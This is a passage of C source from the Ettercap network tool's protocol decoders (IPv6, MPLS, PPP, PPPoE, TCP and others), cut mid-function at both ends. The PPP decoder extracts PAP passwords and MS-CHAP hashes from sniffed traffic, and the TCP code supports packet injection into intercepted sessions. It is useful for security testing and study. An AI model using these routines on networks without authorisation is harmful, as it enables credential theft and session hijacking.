next_decoder = get_decoder(NET6_LAYER, ext_hdr->next_hdr); if(next_decoder == NULL) { next_decoder = get_decoder(PROTO_LAYER, ext_hdr->next_hdr); } EXECUTE_DECODER(next_decoder); return NULL; } FUNC_INJECTOR(inject_ip6) { struct ip6_header *ip6; struct ip6_ident *ident; struct ip6_data *data; struct ec_session *s = NULL; u_int32 magic; u_int16 plen; u_int16 flen; // DEBUG_MSG("inject_ip6"); /* i think im paranoid */ if(LENGTH + sizeof(struct ip6_header) > EC_GBL_IFACE->mtu) return -E_NOTHANDLED; /* almost copied from ec_ip.c */ PACKET->packet -= sizeof(struct ip6_header); ip6 = (struct ip6_header *)PACKET->packet; ip6->version = 6; ip6->next_hdr = PACKET->L4.proto; ip6->hop_limit = 64; memcpy(&ip6->saddr, &PACKET->L3.src.addr, IP6_ADDR_LEN); memcpy(&ip6->daddr, &PACKET->L3.dst.addr, IP6_ADDR_LEN); s = PACKET->session; /* Renew session */ if(session_get(&s, s->ident, sizeof(struct ip6_ident)) == -E_NOTFOUND) return -E_NOTFOUND; ident = s->ident; memcpy(&ip6->flow_lbl, &ident->flow_lbl, 3); data = s->data; ip6->priority = data->priority; flen = LENGTH; LENGTH += sizeof(struct ip6_header); if(s->prev_session != NULL) { PACKET->session = s->prev_session; magic = *(u_int32 *) s->prev_session->ident; EXECUTE_INJECTOR(CHAIN_LINKED, magic); } plen = EC_GBL_IFACE->mtu - LENGTH < PACKET->DATA.inject_len ? EC_GBL_IFACE->mtu - LENGTH : PACKET->DATA.inject_len; ip6->payload_len = htons(plen); PACKET->L3.len = flen + plen; PACKET->L3.header = (u_char *)ip6; if(s->prev_session == NULL) { PACKET->fwd_packet = PACKET->packet; PACKET->fwd_len = PACKET->L3.len; } return E_SUCCESS; } static size_t ip6_create_ident(void **i, struct packet_object *po) { struct ip6_header *ip6; struct ip6_ident *ident; SAFE_CALLOC(ident, 1, sizeof(struct ip6_ident)); ip6 = (struct ip6_header *)po->L3.header; ident->magic = IP6_MAGIC; memcpy(&ident->flow_lbl, ip6->flow_lbl, 3); memcpy(&ident->L3_src, &po->L3.src, sizeof(struct ip_addr)); *i = ident; return sizeof(struct ip6_ident); } static int ip6_match(void *ident_s, void *ident_c) { struct ip6_ident *ids = ident_s; struct ip6_ident *idc = ident_c; if(ids->magic != idc->magic) return 0; if(memcmp(&ids->flow_lbl, &idc->flow_lbl, 3)) return 0; if(ip_addr_cmp(&ids->L3_src, &idc->L3_src)) return 0; return 1; } static void ip6_create_session(struct ec_session **s, struct packet_object *po) { void *ident; DEBUG_MSG("ip6_create_session"); SAFE_CALLOC(*s, 1, sizeof(struct ec_session)); SAFE_CALLOC((*s)->data, 1, sizeof(struct ip6_data)); (*s)->data_len = sizeof(struct ip6_data); (*s)->ident_len = ip6_create_ident(&ident, po); (*s)->ident = ident; (*s)->match = &ip6_match; return; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_mpls.c000664 000000 000000 00000004034 13711276346 020064 0ustar00rootroot000000 000000 /* ettercap -- MPLS decoder module Copyright (C) The Ettercap Dev Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* globals */ struct mpls_header { u_int32 shim; /* * 20 bit for the label * 3 bit for priority * 1 bit for stack bit (1 is the end of the stack, 0 is in the stack: other mpls headers) * 8 bit for time to live */ }; /* protos */ FUNC_DECODER(decode_mpls); void mpls_init(void); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init mpls_init(void) { add_decoder(NET_LAYER, LL_TYPE_MPLS, decode_mpls); } FUNC_DECODER(decode_mpls) { FUNC_DECODER_PTR(next_decoder); struct mpls_header *mpls; DECODED_LEN = sizeof(struct mpls_header); mpls = (struct mpls_header *)DECODE_DATA; /* HOOK POINT : HOOK_PACKET_mpls */ hook_point(HOOK_PACKET_MPLS, po); /* check the end of stack bit */ if (mpls->shim & 0x00010000) { /* leave the control to the IP decoder */ next_decoder = get_decoder(NET_LAYER, LL_TYPE_IP); } else { /* leave the control to the another MPLS header */ next_decoder = get_decoder(NET_LAYER, LL_TYPE_MPLS); } EXECUTE_DECODER(next_decoder); return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_null.c000664 000000 000000 00000006276 13711276346 020075 0ustar00rootroot000000 000000 /* ettercap -- Null/Loopback decoder module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* globals */ struct null_header { u_int32 proto; /* next protocol (usually) in host-byte order */ }; /* protos */ FUNC_DECODER(decode_null); FUNC_ALIGNER(align_null); void null_init(void); /* * this function initiates the decoder and adds the entry in * the decoder table */ void __init null_init(void) { add_decoder(LINK_LAYER, IL_TYPE_NULL, decode_null); add_aligner(IL_TYPE_NULL, align_null); } FUNC_DECODER(decode_null) { FUNC_DECODER_PTR(next_decoder); struct null_header *null; u_int32 lltype, proto; DECODED_LEN = sizeof(struct null_header); null = (struct null_header*)DECODE_DATA; /* * byte order can vary depending on the endianess of the system * the packets have been captured */ proto = ntohl(null->proto); /* * the proto (mainly for IPv6) need to be treated differently * because because for the different BSD derivates the values * have not been standardized */ switch (proto) { case AF_INET: /* IPv4 on any system */ lltype = LL_TYPE_IP; break; #if AF_INET6 != AF_INET6_BSD case AF_INET6_BSD: /* IPv6 on NetBSD,OpenBSD,BSD/OS */ #endif #if AF_INET6 != AF_INET6_FREEBSD case AF_INET6_FREEBSD: /* IPv6 on FreeBSD,DragonFlyBSD */ #endif #if AF_INET6 != AF_INET6_DARWIN case AF_INET6_DARWIN: /* IPv6 on Darwin/Mac OS X */ #endif #if AF_INET6 != AF_INET6_LINUX case AF_INET6_LINUX: /* IPv6 on Linux */ #endif case AF_INET6: /* IPv6 on the compiling system */ lltype = LL_TYPE_IP6; break; default: /* upper protocol not supported by ettercap */ lltype = 0; } /* fill the packet object */ PACKET->L2.header = (u_char*)DECODE_DATA; PACKET->L2.proto = IL_TYPE_NULL; PACKET->L2.len = DECODED_LEN; /* set dummy L2 addresses as they doesn't exist in this proto */ memset(PACKET->L2.src, 0, ETH_ADDR_LEN); memset(PACKET->L2.dst, 0, ETH_ADDR_LEN); /* Hooking on a Loopback interface doesn't make much sense */ /* hand upper protocols over to the next decoder */ next_decoder = get_decoder(NET_LAYER, lltype); EXECUTE_DECODER(next_decoder); return NULL; } /* * alignment function */ FUNC_ALIGNER(align_null) { /* 16 is the nearest multiplier of 4 */ return (16 - sizeof(struct null_header)); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_ppi.c000664 000000 000000 00000003712 13711276346 017703 0ustar00rootroot000000 000000 /* ettercap -- per packet information processor Copyright (C) The Ettercap Dev Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include FUNC_DECODER(decode_ppi); FUNC_ALIGNER(align_ppi); void radiotap_init(void); /*******************************************/ void __init ppi_init(void) { add_decoder(LINK_LAYER, IL_TYPE_PPI, decode_ppi); add_aligner(IL_TYPE_PPI, align_ppi); } FUNC_DECODER(decode_ppi) { FUNC_DECODER_PTR(next_decoder); unsigned char* data = DECODE_DATA; if (PACKET->len <= 4) { // not enough data to be useful ppi return NULL; } if (data[0] != 0) { // unknown version field return NULL; } if (data[1] != 0) { // TODO handle unaligned data. What would this look like? return NULL; } uint16_t header_len = (data[3] << 8) | (data[2]); if (header_len >= PACKET->len) { // not enough data to be interesting return NULL; } char next_hop = data[4]; DECODED_LEN = header_len; next_decoder = get_decoder(LINK_LAYER, next_hop); EXECUTE_DECODER(next_decoder); return NULL; } /* * alignment function */ FUNC_ALIGNER(align_ppi) { return 0; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_ppp.c000664 000000 000000 00000020767 13711276346 017723 0ustar00rootroot000000 000000 /* ettercap -- PPP decoder module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include /* globals */ struct ppp_header { u_char address; u_char control; u_int16 proto; }; struct ppp_lcp_header { u_char code; u_char ident; u_int16 length; }; struct ppp_chap_challenge { u_char size; union { u_char challenge_v1[8]; u_char challenge_v2[16]; struct { u_char lanman[24]; u_char nt[24]; u_char flag; } response_v1; struct { u_char peer_challenge[16]; u_char reserved[8]; u_char nt[24]; u_char flag; } response_v2; } value; }; #define PPP_PROTO_IP 0x0021 #define PPP_PROTO_CHAP 0xc223 #define PPP_PROTO_PAP 0xc023 #define PPP_PROTO_LCP 0xc021 #define PPP_PROTO_ECP 0x8053 #define PPP_PROTO_CCP 0x80fd #define PPP_PROTO_IPCP 0x8021 #define PPP_CHAP_CODE_CHALLENGE 1 #define PPP_CHAP_CODE_RESPONSE 2 /* protos */ FUNC_DECODER(decode_ppp); FUNC_ALIGNER(align_ppp); void ppp_init(void); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init ppp_init(void) { add_decoder(LINK_LAYER, IL_TYPE_PPP, decode_ppp); add_aligner(IL_TYPE_PPP, align_ppp); dissect_add("ppp", NET_LAYER, LL_TYPE_PPP, decode_ppp); } FUNC_DECODER(decode_ppp) { FUNC_DECODER_PTR(next_decoder); struct ppp_header *ppph; struct ppp_lcp_header *lcph; struct ppp_chap_challenge *chapch; u_int16 proto; u_int32 i; u_char auth_len; char user[128], dummy[3], temp[128], *pap_auth; static char version=0, schallenge[512]; u_char digest[SHA_DIGEST_LENGTH]; SHA_CTX ctx; ppph = (struct ppp_header *)DECODE_DATA; /* Set the L4 header for the hook */ PACKET->L4.header = (u_char *)DECODE_DATA; /* HOOK POINT: HOOK_PACKET_PPP */ hook_point(HOOK_PACKET_PPP, PACKET); /* We have to guess if header compression was negotiated */ /* XXX - && or || ??? */ if (ppph->address != 0xff && ppph->control != 0x3) { proto = *((u_char *)ppph); if (proto != PPP_PROTO_IP) { proto = ntohs(*((u_int16 *)ppph)); DECODED_LEN = 2; } else DECODED_LEN = 1; } else { proto = ntohs(ppph->proto); DECODED_LEN = sizeof(ppph); if (proto != PPP_PROTO_IP && proto != PPP_PROTO_CHAP && proto != PPP_PROTO_PAP && proto != PPP_PROTO_LCP && proto != PPP_PROTO_ECP && proto != PPP_PROTO_CCP && proto != PPP_PROTO_IPCP) { proto = *((u_char *)ppph + 2); DECODED_LEN = 3; } } /* Set the L4 header to LCP for subsequent hooks */ PACKET->L4.header = (u_char *)(DECODE_DATA + DECODED_LEN); /* XXX - Add standard CHAP parsing */ /* XXX - IPv6 over PPP? */ if (proto == PPP_PROTO_IP) { /* If the payload is an IP packet... */ /* ...get the next decoder */ next_decoder = get_decoder(NET_LAYER, LL_TYPE_IP); EXECUTE_DECODER(next_decoder); } else if (proto == PPP_PROTO_CHAP) { /* Parse MSCHAP auth schemes */ lcph = (struct ppp_lcp_header *)(DECODE_DATA + DECODED_LEN); chapch = (struct ppp_chap_challenge *)(lcph + 1); switch (lcph->code) { case PPP_CHAP_CODE_CHALLENGE: if (chapch->size == 8) { schallenge[0]=0; version = 1; for (i=0; i<8; i++) { snprintf(dummy, 3, "%02X", chapch->value.challenge_v1[i]); strcat(schallenge, dummy); } } else if (chapch->size == 16) { version = 2; memcpy (schallenge, chapch->value.challenge_v2, chapch->size); } else version = 0; break; case PPP_CHAP_CODE_RESPONSE: if (version != 1 && version !=2) break; i = ntohs(lcph->length) - 5 - chapch->size; if (i > sizeof(user)-2) i = sizeof(user)-2; memcpy(user, (u_char *)lcph + 5 + chapch->size, i); user[i] = '\0'; /* Check if it's from PPP or PPTP */ if (!ip_addr_null(&PACKET->L3.dst) && !ip_addr_null(&PACKET->L3.src)) { DISSECT_MSG("\n\nTunnel PPTP: %s -> ", ip_addr_ntoa(&PACKET->L3.src, temp)); DISSECT_MSG("%s\n", ip_addr_ntoa(&PACKET->L3.dst, temp)); } DISSECT_MSG("PPP*MS-CHAP Password*%s:$MSCHAPv2$", user); if (version == 1) { for (i = 0; i < 24; i++) DISSECT_MSG("%02X", chapch->value.response_v1.lanman[i]); DISSECT_MSG(":"); for (i = 0; i < 24; i++) DISSECT_MSG("%02X", chapch->value.response_v1.nt[i]); DISSECT_MSG(":%s\n\n",schallenge); } else if (version == 2) { /*#ifdef HAVE_OPENSSL */ char *p; if ((p = strchr(user, '\\')) == NULL) p = user; else p++; SHA1_Init(&ctx); SHA1_Update(&ctx, chapch->value.response_v2.peer_challenge, 16); SHA1_Update(&ctx, schallenge, 16); SHA1_Update(&ctx, p, strlen(p)); SHA1_Final(digest, &ctx); for (i = 0; i < 8; i++) DISSECT_MSG("%02X", digest[i]); DISSECT_MSG("$"); for (i = 0; i < 24; i++) DISSECT_MSG("%02X",chapch->value.response_v2.nt[i]); DISSECT_MSG("$%s\n\n", user); /*#else for (i = 0; i < 16; i++) DISSECT_MSG("%02X", schallenge[i]); DISSECT_MSG("$"); for (i = 0; i < 24; i++) DISSECT_MSG("%02X",chapch->value.response_v2.nt[i]); DISSECT_MSG("$"); for (i = 0; i < 16; i++) DISSECT_MSG("%02X",chapch->value.response_v2.peer_challenge[i]); DISSECT_MSG("$%s\n\n", user); #endif*/ } version = 0; break; } } else if (proto == PPP_PROTO_PAP) { /* Parse PAP auth scheme */ lcph = (struct ppp_lcp_header *)(DECODE_DATA + DECODED_LEN); pap_auth = (char *)(lcph + 1); if (lcph->code == 1) { /* Check if it's from PPP or PPTP */ if (!ip_addr_null(&PACKET->L3.dst) && !ip_addr_null(&PACKET->L3.src)) { DISSECT_MSG("\n\nTunnel PPTP: %s -> ", ip_addr_ntoa(&PACKET->L3.src, temp)); DISSECT_MSG("%s\n", ip_addr_ntoa(&PACKET->L3.dst, temp)); } DISSECT_MSG("PPP : PAP User: "); auth_len = *pap_auth; if (auth_len > sizeof(temp)-2) auth_len = sizeof(temp)-2; pap_auth++; memcpy(temp, pap_auth, auth_len); temp[auth_len] = 0; DISSECT_MSG("%s\n",temp); pap_auth += auth_len; auth_len = *pap_auth; pap_auth++; if (auth_len > sizeof(temp)-2) auth_len = sizeof(temp)-2; memcpy(temp, pap_auth, auth_len); temp[auth_len] = 0; DISSECT_MSG("PPP : PAP Pass: %s\n\n", temp); } } else if (proto == PPP_PROTO_LCP) { /* HOOK POINT: HOOK_PACKET_LCP */ hook_point(HOOK_PACKET_LCP, PACKET); } else if (proto == PPP_PROTO_ECP || proto == PPP_PROTO_CCP) { /* HOOK POINT: HOOK_PACKET_ECP */ hook_point(HOOK_PACKET_ECP, PACKET); } else if (proto == PPP_PROTO_IPCP) { /* HOOK POINT: HOOK_PACKET_IPCP */ hook_point(HOOK_PACKET_IPCP, PACKET); } return NULL; } FUNC_ALIGNER(align_ppp) { // should be file only. nothing to align return 0; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_pppoe.c000664 000000 000000 00000003465 13711276346 020243 0ustar00rootroot000000 000000 /* ettercap -- PPP over Ethernet decoder module Copyright (C) The Ettercap Dev Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* globals */ struct pppoe_header { u_int8 version; u_int8 session; u_int16 id; u_int16 len; u_int16 proto; /* this is actually part of the PPP header */ }; /* protos */ FUNC_DECODER(decode_pppoe); void pppoe_init(void); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init pppoe_init(void) { add_decoder(NET_LAYER, LL_TYPE_PPPOE, decode_pppoe); } FUNC_DECODER(decode_pppoe) { FUNC_DECODER_PTR(next_decoder); struct pppoe_header *pppoe; DECODED_LEN = sizeof(struct pppoe_header); pppoe = (struct pppoe_header *)DECODE_DATA; /* HOOK POINT : HOOK_PACKET_pppoe */ hook_point(HOOK_PACKET_PPPOE, po); /* leave the control to the next decoder */ next_decoder = get_decoder(NET_LAYER, ntohs(pppoe->proto)); EXECUTE_DECODER(next_decoder); return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_rawip.c000664 000000 000000 00000003435 13711276346 020237 0ustar00rootroot000000 000000 /* ettercap -- Raw IP decoder module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* globals */ /* protos */ FUNC_DECODER(decode_rawip); FUNC_ALIGNER(align_rawip); void rawip_init(void); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init rawip_init(void) { add_decoder(LINK_LAYER, IL_TYPE_RAWIP, decode_rawip); add_aligner(IL_TYPE_RAWIP, align_rawip); } FUNC_DECODER(decode_rawip) { FUNC_DECODER_PTR(next_decoder); DECODED_LEN = 0; /* * there is no L2 header, it is raw ip, * so skip the L2 and invoke directly * the L3 dissector */ PACKET->L2.header = (u_char *)DECODE_DATA; PACKET->L2.proto = IL_TYPE_RAWIP; PACKET->L2.len = DECODED_LEN; next_decoder = get_decoder(NET_LAYER, LL_TYPE_IP); EXECUTE_DECODER(next_decoder); return NULL; } /* * alignment function */ FUNC_ALIGNER(align_rawip) { /* already aligned */ return 0; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_tcp.c000664 000000 000000 00000037451 13711276346 017710 0ustar00rootroot000000 000000 /* ettercap -- TCP decoder module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include /* globals */ struct tcp_header { u_int16 sport; /* source port */ u_int16 dport; /* destination port */ u_int32 seq; /* sequence number */ u_int32 ack; /* acknowledgement number */ #ifndef WORDS_BIGENDIAN u_int8 x2:4; /* (unused) */ u_int8 off:4; /* data offset */ #else u_int8 off:4; /* data offset */ u_int8 x2:4; /* (unused) */ #endif u_int8 flags; #define TH_FIN 0x01 #define TH_SYN 0x02 #define TH_RST 0x04 #define TH_PSH 0x08 #define TH_ACK 0x10 #define TH_URG 0x20 #define TH_ECE 0x40 /* rfc 2481/3168 */ #define TH_CWR 0x80 /* rfc 2481/3168 */ u_int16 win; /* window */ u_int16 csum; /* checksum */ u_int16 urp; /* urgent pointer */ }; /* tcp options */ #define TCPOPT_EOL 0 #define TCPOPT_NOP 1 #define TCPOPT_MAXSEG 2 #define TCPOPT_WSCALE 3 #define TCPOPT_SACKOK 4 #define TCPOPT_TIMESTAMP 8 /* Session identifier * It has to be even-lengthed for session hash matching */ struct tcp_ident { u_int32 magic; #define TCP_MAGIC 0x0400e77e struct ip_addr L3_src; struct ip_addr L3_dst; u_int16 L4_src; u_int16 L4_dst; }; #define TCP_IDENT_LEN sizeof(struct tcp_ident) /* protos */ FUNC_DECODER(decode_tcp); FUNC_INJECTOR(inject_tcp); void tcp_init(void); int tcp_match(void *id_sess, void *id_curr); void tcp_create_session(struct ec_session **s, struct packet_object *po); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init tcp_init(void) { add_decoder(PROTO_LAYER, NL_TYPE_TCP, decode_tcp); add_injector(CHAIN_ENTRY, NL_TYPE_TCP, inject_tcp); } FUNC_DECODER(decode_tcp) { FUNC_DECODER_PTR(next_decoder); struct tcp_header *tcp; u_char *opt_start, *opt_end; struct ec_session *s = NULL; void *ident = NULL; struct tcp_status *status = NULL; int direction = 0; u_int16 sum; tcp = (struct tcp_header *)DECODE_DATA; opt_start = (u_char *)(tcp + 1); opt_end = (u_char*)tcp + tcp->off * 4; DECODED_LEN = (u_int32)(tcp->off * 4); /* source and dest port */ PACKET->L4.src = tcp->sport; PACKET->L4.dst = tcp->dport; PACKET->L4.len = DECODED_LEN; PACKET->L4.header = (u_char *)DECODE_DATA; if (opt_start < opt_end) { PACKET->L4.options = opt_start; PACKET->L4.optlen = opt_end - opt_start; } else { PACKET->L4.options = NULL; PACKET->L4.optlen = 0; } /* this is TCP */ PACKET->L4.proto = NL_TYPE_TCP; /* save the flags */ PACKET->L4.flags = tcp->flags; /* save the seq number */ PACKET->L4.seq = tcp->seq; PACKET->L4.ack = tcp->ack; /* set up the data pointers */ PACKET->DATA.data = opt_end; if (PACKET->L3.payload_len < (u_int32)DECODED_LEN) return NULL; PACKET->DATA.len = PACKET->L3.payload_len - DECODED_LEN; /* create the buffer to be displayed */ packet_disp_data(PACKET, PACKET->DATA.data, PACKET->DATA.len); /* * if the checsum is wrong, don't parse it (avoid ettercap spotting) * the checksum is should be CSUM_RESULT and not equal to tcp->csum ;) * * don't perform the check in unoffensive mode */ if (EC_GBL_CONF->checksum_check) { if (!EC_GBL_OPTIONS->unoffensive && (sum = L4_checksum(PACKET)) != CSUM_RESULT) { char tmp[MAX_ASCII_ADDR_LEN]; #if defined(OS_DARWIN) || defined (OS_WINDOWS) || defined(OS_LINUX) /* * XXX - hugly hack here ! Mac OS X really sux * * Packets transmitted on interfaces with TCP checksum offloading * don't have valid checksums as presented to the machine's packet-capture * mechanism, as those packets are wrapped around internally rather * than being captured after passing through the network interface, as * the OS doesn't bother computing the checksum and adding it to the packet * it leaves that up to the network interface. * (taken from a bug report by Guy Harris - libpcap engineer) * * For Windows at least, TCP checksum off-loading can be disabled with a * registry setting. * * Same for Linux, but sometimes even ethtool doesn't turn this feature off. * * if the source is the ettercap host, don't display the message */ if (ip_addr_is_ours(&PACKET->L3.src) == E_FOUND) return NULL; #endif if (EC_GBL_CONF->checksum_warning) USER_MSG("Invalid TCP packet from %s:%d : csum [%#x] should be (%#x)\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(tcp->sport), ntohs(tcp->csum), checksum_shouldbe(tcp->csum, sum)); return NULL; } } /* * complete the passive fingerprint (started at IP layer) * we are interested only in SYN or SYN+ACK packets * else we can destroy the fingerprint */ if ( tcp->flags & TH_SYN ) { fingerprint_push(PACKET->PASSIVE.fingerprint, FINGER_WINDOW, ntohs(tcp->win)); fingerprint_push(PACKET->PASSIVE.fingerprint, FINGER_TCPFLAG, (tcp->flags & TH_ACK) ? 1 : 0); /* this is added to the len of ip header (automatic) */ fingerprint_push(PACKET->PASSIVE.fingerprint, FINGER_LT, tcp->off * 4); while (opt_start < opt_end) { switch (*opt_start) { case TCPOPT_EOL: /* end option EXIT */ opt_start = opt_end; break; case TCPOPT_NOP: fingerprint_push(PACKET->PASSIVE.fingerprint, FINGER_NOP, 1); opt_start++; break; case TCPOPT_SACKOK: fingerprint_push(PACKET->PASSIVE.fingerprint, FINGER_SACK, 1); opt_start += 2; break; case TCPOPT_MAXSEG: opt_start += 2; fingerprint_push(PACKET->PASSIVE.fingerprint, FINGER_MSS, pntos(opt_start)); opt_start += 2; break; case TCPOPT_WSCALE: opt_start += 2; fingerprint_push(PACKET->PASSIVE.fingerprint, FINGER_WS, *opt_start); opt_start++; break; case TCPOPT_TIMESTAMP: fingerprint_push(PACKET->PASSIVE.fingerprint, FINGER_TIMESTAMP, 1); opt_start++; if ((*opt_start) > 0) opt_start += ((*opt_start) - 1); break; default: opt_start++; if (*opt_start > 0) opt_start += (*opt_start - 1); break; } } } else { /* not an interesting packet */ memset(PACKET->PASSIVE.fingerprint, 0, FINGER_LEN); } /* HOOK POINT: HOOK_PACKET_TCP */ hook_point(HOOK_PACKET_TCP, po); /* don't save the sessions in unoffensive mode */ /* don't save sessions if no filters chain are defined */ if (EC_GBL_FILTERS && !EC_GBL_OPTIONS->unoffensive && !EC_GBL_OPTIONS->read) { /* Find or create the correct session */ tcp_create_ident(&ident, PACKET); if (session_get(&s, ident, TCP_IDENT_LEN) == -E_NOTFOUND) { tcp_create_session(&s, PACKET); session_put(s); } /* Trace the sessions for injectors */ SESSION_PASSTHRU(s, PACKET); /* Select right comunication way */ direction = tcp_find_direction(s->ident, ident); SAFE_FREE(ident); /* Record last packet's seq */ status = (struct tcp_status *)s->data; status->way[direction].last_seq = ntohl(tcp->seq) + PACKET->DATA.len; if ( tcp->flags & TH_ACK ) status->way[direction].last_ack = ntohl(tcp->ack); /* SYN counts as one byte */ if ( tcp->flags & TH_SYN ) status->way[direction].last_seq++; /* Take trace of the RST flag (to block injection) */ if ( tcp->flags & TH_RST ) { status->way[direction].injectable |= INJ_FIN; status->way[!direction].injectable |= INJ_FIN; } /* Take trace if this side of connection is mitm'd */ if (PACKET->flags & PO_FORWARDABLE) status->way[direction].injectable |= INJ_FWD; else if (status->way[direction].injectable & INJ_FWD) status->way[direction].injectable ^= INJ_FWD; } /* get the next decoder */ next_decoder = get_decoder(APP_LAYER, PL_DEFAULT); EXECUTE_DECODER(next_decoder); /* don't save the sessions in unoffensive mode */ if (EC_GBL_FILTERS && !EC_GBL_OPTIONS->unoffensive && !EC_GBL_OPTIONS->read) { /* * Take trace of the FIN flag (to block injection) * It's here to permit some strange tricks with filters. */ if ( tcp->flags & TH_FIN ) status->way[direction].injectable |= INJ_FIN; /* * Modification checks and adjustments. * - tcp->seq and tcp->ack accoridng to injected/dropped bytes * - seq_adj according to PACKET->delta for modifications * or the whole payload for dropped packets. * Don't adjust sequence if not forwardable. */ /* XXX [...] over TCP encapsulation not supported yet: * upper layer may modify L3 structure */ if ((PACKET->flags & PO_DROPPED) && (PACKET->flags & PO_FORWARDABLE)) status->way[direction].seq_adj += PACKET->DATA.delta; else if (((PACKET->flags & PO_MODIFIED) || (status->way[direction].seq_adj != 0) || (status->way[!direction].seq_adj != 0)) && (PACKET->flags & PO_FORWARDABLE)) { /* adjust with the previously injected/dropped seq/ack */ ORDER_ADD_LONG(tcp->seq, status->way[direction].seq_adj); ORDER_ADD_LONG(tcp->ack, -status->way[!direction].seq_adj); /* and now save the new delta */ status->way[direction].seq_adj += PACKET->DATA.delta; /* Recalculate checksum */ tcp->csum = CSUM_INIT; tcp->csum = L4_checksum(PACKET); } } return NULL; } /*******************************************/ FUNC_INJECTOR(inject_tcp) { struct ec_session *s = NULL; void *ident = NULL; struct tcp_status *status; int direction; struct tcp_header *tcph; u_char *tcp_payload; u_int32 magic; /* Find the correct session */ tcp_create_ident(&ident, PACKET); if (session_get(&s, ident, TCP_IDENT_LEN) == -E_NOTFOUND) { SAFE_FREE(ident); return -E_NOTFOUND; } /* Rember where the payload has to start */ tcp_payload = PACKET->packet; /* Allocate stack for tcp header */ PACKET->packet -= sizeof(struct tcp_header); /* Create the tcp header */ tcph = (struct tcp_header *)PACKET->packet; tcph->sport = PACKET->L4.src; tcph->dport = PACKET->L4.dst; tcph->x2 = 0; tcph->off = 5; tcph->win = htons(32120); tcph->csum = CSUM_INIT; tcph->urp = 0; tcph->flags = TH_PSH; /* Take the rest of the data from the sessions */ status = (struct tcp_status *)s->data; direction = tcp_find_direction(s->ident, ident); SAFE_FREE(ident); /* Is this an injectable connection? */ if ((status->way[direction].injectable & INJ_FIN) || !(status->way[direction].injectable & INJ_FWD) || !(status->way[!direction].injectable & INJ_FWD)) return -E_NOTHANDLED; tcph->seq = htonl(status->way[direction].last_seq + status->way[direction].seq_adj); tcph->ack = htonl(status->way[direction].last_ack - status->way[!direction].seq_adj); if (status->way[direction].last_ack!=0) tcph->flags |= TH_ACK; /* Prepare data for next injector */ PACKET->session = s->prev_session; LENGTH += sizeof(struct tcp_header); memcpy(&magic, s->prev_session->ident, 4); /* Go 